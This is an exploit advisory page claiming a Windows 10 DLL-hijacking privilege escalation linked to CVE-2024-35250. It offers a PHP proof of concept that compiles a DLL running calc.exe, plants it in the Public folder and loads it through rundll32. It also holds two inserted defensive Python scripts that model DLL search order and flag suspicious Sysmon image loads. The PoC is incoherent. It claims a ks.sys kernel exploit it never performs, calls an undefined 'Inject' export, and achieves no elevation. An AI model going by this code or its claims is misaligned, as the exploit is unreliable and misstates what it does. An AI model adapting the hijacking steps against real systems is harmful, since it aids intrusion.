Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking
Microsoft Windows 10 Famille build 10.0.19045.5487, like many operating system versions, could have been susceptible to DLL Hijacking vulnerabilities.

DLL Hijacking exploits how applications load Dynamic Link Libraries (DLLs). Instead of loading a legitimate system DLL, a vulnerable application could be tricked into loading a malicious one placed in a predictable location.

This typically occurs when an application searches for a DLL without specifying its full path, allowing an attacker to place a specially crafted DLL in a directory prioritized by the search order (e.g., current working directory).

Upon execution, the vulnerable application would then load and execute the attacker's malicious code. This could lead to arbitrary code execution, privilege escalation, or system compromise.
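The search order just described can be modeled directly, which is the quickest way to see where a bare-name import actually ends up. The Python script below is an added example and not part of the original advisory: it walks the standard Windows DLL search order with SafeDllSearchMode both on (the default) and off, and for each imported DLL reports whether it resolves to a trusted location, to a directory a standard user can write to, or to nothing at all. The application directory, current directory, PATH entries, writable directories and file layout are constructed sample data; the KnownDLLs set is a small constructed subset of the real list under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.

```python
"""Model the Windows DLL search order to spot bare-name imports that would
resolve into a user-writable directory (added example with constructed data)."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"

# Constructed subset of KnownDLLs. The loader takes these from System32 no
# matter what the search order says; the real list is in the registry under
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}


def search_order(app_dir: str, cwd: str, path_dirs: Iterable[str],
                 safe_search: bool = True) -> List[str]:
    """Directories the loader walks for a DLL requested without a full path.

    With SafeDllSearchMode on (the default) the current directory is checked
    only after the system directories; with it off it comes right after the
    application directory, ahead of System32."""
    if safe_search:
        order = [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd]
    else:
        order = [app_dir, cwd, SYSTEM32, SYSTEM16, WINDIR]
    return order + list(path_dirs)


@dataclass
class Finding:
    dll: str
    status: str          # "ok", "hijackable" or "missing"
    path: Optional[str]  # resolved file; for "missing", the first writable dir in the order


def resolve_dll(name: str, fs: Dict[str, Set[str]], order: List[str]) -> Optional[str]:
    """Return the first path in the search order that contains `name`."""
    for directory in order:
        if name in fs.get(directory, set()):
            return directory + "\\" + name
    return None


def in_writable_dir(path: str, user_writable: Set[str]) -> bool:
    return any(path.lower().startswith(d.lower() + "\\") for d in user_writable)


def audit_imports(imports, fs, app_dir, cwd, path_dirs, user_writable, safe_search=True):
    """Classify each bare-name import under the given search-order settings."""
    order = search_order(app_dir, cwd, path_dirs, safe_search)
    findings = []
    for name in imports:
        name = name.lower()
        if name in KNOWN_DLLS:
            findings.append(Finding(name, "ok", SYSTEM32 + "\\" + name))
            continue
        path = resolve_dll(name, fs, order)
        if path is None:
            # Not installed anywhere: the first writable directory in the
            # search order is where a planted copy would be picked up first.
            writable = [d for d in order if d in user_writable]
            findings.append(Finding(name, "missing", writable[0] if writable else None))
        elif in_writable_dir(path, user_writable):
            findings.append(Finding(name, "hijackable", path))
        else:
            findings.append(Finding(name, "ok", path))
    return findings


# ---- constructed sample environment -------------------------------------
APP_DIR = r"C:\Program Files\ExampleApp"
CWD = r"C:\Users\alice\Downloads"       # the app was launched from a download folder
PATH_DIRS = [r"C:\Users\Public"]        # an installer appended a world-writable folder to PATH
USER_WRITABLE = {CWD, r"C:\Users\Public"}
FS = {
    APP_DIR: {"exampleapp.exe"},
    SYSTEM32: {"kernel32.dll", "version.dll"},
    CWD: {"version.dll"},               # a stray copy of a system DLL next to the download
}
IMPORTS = ["kernel32.dll", "version.dll", "helper.dll"]  # helper.dll is not installed at all

if __name__ == "__main__":
    for safe in (True, False):
        print(f"SafeDllSearchMode={'on' if safe else 'off'}")
        for f in audit_imports(IMPORTS, FS, APP_DIR, CWD, PATH_DIRS, USER_WRITABLE, safe):
            print(f"  {f.dll:14} {f.status:10} {f.path}")
```

With SafeDllSearchMode on, version.dll still comes from System32 and only the uninstalled helper.dll is exposed; with it off, the copy in the current directory wins. On a real host the equivalent check is to confirm that HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode is not set to 0 and that no user-writable directory sits on the system PATH.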

Such vulnerabilities are typically addressed through security updates from Microsoft. Users are always advised to keep their operating systems fully patched to mitigate known threats.

=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.

There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11 and Windows Server 2022.

[+] What's new in this version?

Added DLL Hijacking exploit inside the code

Create a malicious DLL library directly from inside the code

Use rundll32.exe to automatically load the payload

Ensure all possible environments are supported (Windows 10 and 11)

Improved compatibility with different languages

(Related: https://packetstorm.news/files/id/182984/ ; related CVE number: CVE-2024-35250).


[+] Usage : php poc.php

[+] PayLoad :

<?php
/**
 * CVE-2024-35250 Windows proof of concept + DLL Hijacking.
 * The original docblock, comments and status messages were Arabic and
 * mis-encoded in the source; they are rendered in English here from context.
 */

function getWindowsLCID() {
    // "wmic os get locale" prints the LCID as hex, e.g. Locale=0409 -> 1033 (en-US)
    $output = shell_exec('wmic os get locale /value');
    preg_match('/Locale=(\w+)/', $output, $matches);
    return isset($matches[1]) ? hexdec($matches[1]) : 1033; // default to en-US
}

function localeToLanguage($locale) {
    // LCID => [language name, localized display name of the Public profile folder].
    // Note: Windows keeps the on-disk path at C:\Users\Public in every language;
    // the localized names below are only what Explorer displays.
    $languages = [
        1033 => ['English', 'C:\\Users\\Public\\'], // en-US
        1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
        3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
        1046 => ['Portuguese', 'C:\\Usuários\\Public\\'], // pt-BR
        1031 => ['German', 'C:\\Benutzer\\Öffentlich\\'], // de-DE
        1049 => ['Russian', 'C:\\Пользователи\\Общие\\'], // ru-RU
        1056 => ['Persian', 'C:\\کاربران\\عمومی\\'], // fa-IR
        1025 => ['Arabic', 'C:\\المستخدمون\\عام\\'], // ar-SA
        1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN
        1114 => ['Aramaic', 'C:\\???????\\??????\\'], // folder name mis-encoded in the source
        1037 => ['Hebrew', 'C:\\משתמשים\\ציבורי\\'], // he-IL
        2052 => ['Chinese (Simplified)', 'C:\\用户\\公用\\'], // zh-CN
        1028 => ['Chinese (Traditional)', 'C:\\使用者\\公用\\'], // zh-TW
        1041 => ['Japanese', 'C:\\ユーザー\\パブリック\\'], // ja-JP
        1042 => ['Korean', 'C:\\사용자\\공용\\'], // ko-KR
        1054 => ['Thai', 'C:\\ผู้ใช้\\สาธารณะ\\'], // th-TH
        1066 => ['Vietnamese', 'C:\\Người dùng\\Công cộng\\'], // vi-VN
    ];

    return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; // fall back to the English path
}

function getPublicPath() {
    $locale = getWindowsLCID();
    list($lang, $path) = localeToLanguage($locale);
    echo "[+] System language: $lang (LCID: $locale)\n";
    return $path;
}

function is64BitWindows() {
    // Checks the bitness of the PHP interpreter, not of Windows itself:
    // a 32-bit PHP on 64-bit Windows returns false here.
    return (PHP_INT_SIZE === 8);
}

function checkVulnerableDriver() {
    $winDir = getenv('WINDIR');
    $driverPath = $winDir . '\\system32\\drivers\\ks.sys';

    if (!file_exists($driverPath)) {
        die("[X] ks.sys driver not found; the system may not be vulnerable.\n");
    }

    echo "[+] ks.sys found at: $driverPath\n";
    return true;
}

function getWindowsBuildNumber() {
    $output = shell_exec('wmic os get BuildNumber /value');
    preg_match('/BuildNumber=(\d+)/', $output, $matches);
    return $matches[1] ?? null;
}

function isVulnerableVersion($buildNumber) {
    $vulnerableBuilds = range(14393, 19045); // Windows 10 1607 through Windows 10 22H2
    return in_array($buildNumber, $vulnerableBuilds);
}

function createMaliciousDLL($dllPath) {
    $dllCode = <<<EOD
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c calc.exe"); // launch calc.exe as a harmless test payload
    }
    return TRUE;
}
EOD;

    file_put_contents("payload.c", $dllCode);
    shell_exec("gcc -shared -o $dllPath payload.c -mwindows"); // requires gcc (MinGW) on PATH
}

function exploit() {
    if (!is64BitWindows()) {
        die("[X] Only 64-bit systems are supported.\n");
    }

    if (!checkVulnerableDriver()) {
        die("[X] System is not vulnerable.\n");
    }

    $buildNumber = getWindowsBuildNumber();
    if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
        die("[X] Unsupported Windows version: $buildNumber\n");
    }

    echo "[+] System looks vulnerable; preparing payload...\n";

    $publicPath = getPublicPath();
    $payloadPath = $publicPath . "exploit_payload.dll";

    echo "[+] Payload path: $payloadPath\n";

    createMaliciousDLL($payloadPath);

    echo "[+] DLL written; starting the target process...\n";

    $notepad = shell_exec('start /B notepad.exe'); // start notepad as the process expected to load the DLL
    sleep(1);

    echo "[+] Notepad started; invoking the payload...\n";
    shell_exec("rundll32 $payloadPath,Inject"); // load the DLL through rundll32
}

exploit();
?>
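From the detection side, the activity this PoC produces (a freshly compiled DLL in a world-writable profile folder, loaded by rundll32.exe) is visible in image-load telemetry. The Python scan below is an added example and not part of the original advisory: it reads constructed Sysmon Event ID 7 (ImageLoad) records flattened to key=value lines and flags DLLs loaded from user-writable directories, rundll32.exe loading a DLL from outside the usual install roots, and system DLL names loaded from outside System32. The event lines, the set of system DLL names and the list of writable locations are all constructed sample data; only the field names (Image, ImageLoaded, Signed) follow Sysmon's ImageLoad event.

```python
"""Flag suspicious DLL loads in Sysmon-style ImageLoad records
(added example with constructed data)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Install roots where a DLL handed to rundll32.exe is normally expected to live.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Locations a standard user can write to (constructed, non-exhaustive).
WRITABLE_RE = re.compile(
    r"^c:\\users\\(public|[^\\]+\\(downloads|desktop|documents|appdata\\local\\temp))\\"
    r"|^c:\\windows\\temp\\"
)
# Constructed subset of DLL names that ship in System32 and are commonly
# imported by bare name, so a copy anywhere else deserves a look.
SYSTEM_DLL_NAMES = {"version.dll", "dwmapi.dll", "cryptsp.dll", "profapi.dll"}

R_WRITABLE = "dll loaded from a user-writable directory"
R_RUNDLL32 = "rundll32.exe loading a dll outside trusted install roots"
R_SHADOW = "system dll name loaded from outside the system directory"

# key=value pairs whose values may contain spaces (e.g. C:\Program Files\...)
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


@dataclass
class Finding:
    process: str
    dll: str
    reasons: List[str]


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=value Key2=value with spaces' into a dict."""
    return dict(KV_RE.findall(line))


def analyze(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per ImageLoad event that trips at least one rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "7":  # only ImageLoad events carry ImageLoaded
            continue
        proc = ev["Image"].lower()
        dll = ev["ImageLoaded"].lower()
        dll_name = dll.rpartition("\\")[2]
        reasons = []
        if WRITABLE_RE.match(dll):
            reasons.append(R_WRITABLE)
        if proc.endswith("\\rundll32.exe") and not dll.startswith(TRUSTED_ROOTS):
            reasons.append(R_RUNDLL32)
        if dll_name in SYSTEM_DLL_NAMES and not dll.startswith(SYSTEM_DIRS):
            reasons.append(R_SHADOW)
        if reasons:
            findings.append(Finding(ev["Image"], ev["ImageLoaded"], reasons))
    return findings


# Constructed records; field names follow Sysmon Event ID 7.
SAMPLE_EVENTS = [
    r"EventID=7 Image=C:\Windows\System32\notepad.exe ImageLoaded=C:\Windows\System32\kernel32.dll Signed=true",
    r"EventID=7 Image=C:\Windows\System32\rundll32.exe ImageLoaded=C:\Users\Public\exploit_payload.dll Signed=false",
    r"EventID=7 Image=C:\Program Files\ExampleApp\exampleapp.exe ImageLoaded=C:\Users\alice\Downloads\version.dll Signed=false",
    r"EventID=7 Image=C:\Program Files\Vendor\app.exe ImageLoaded=C:\Program Files\Vendor\helper.dll Signed=true",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c whoami",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.process} -> {f.dll}")
        for r in f.reasons:
            print("   ", r)
```

The rundll32 rule and the writable-directory rule both fire on the second record, which is exactly the shape of load this PoC performs; the third record shows the quieter case of a system DLL name resolving from a download folder, which needs no rundll32 at all. Pairing these with the Signed field (unsigned DLL loaded from a profile folder) keeps the false-positive rate manageable on real telemetry.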


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸